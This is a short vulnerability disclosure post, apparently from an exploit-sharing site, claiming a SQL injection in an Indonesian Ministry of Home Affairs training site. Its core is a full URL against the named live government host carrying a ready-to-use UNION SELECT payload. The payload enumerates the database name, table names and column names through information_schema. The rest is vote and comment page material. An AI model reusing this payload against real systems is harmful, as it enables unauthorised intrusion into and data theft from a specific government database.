PPSDM Kemendagri SQL Vulnerable

2019.12.31

KHS1N Cyber 07 (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#Nick name : KHS1N Cyber 07
#Youtube   : HCT Sec07

Vulnerabilty : 
#SQL Injection

domain site && payload :
http://ppsdmregbandung.kemendagri.go.id/caribuku/doc/indek.php?page=rinci_buku&id=-600%27+union+select+1,2,3,4,5,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/,7,8,9,10,11,12,13,14--+--

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

PPSDM Kemendagri SQL Vulnerable

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

PPSDM Kemendagri SQL Vulnerable

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.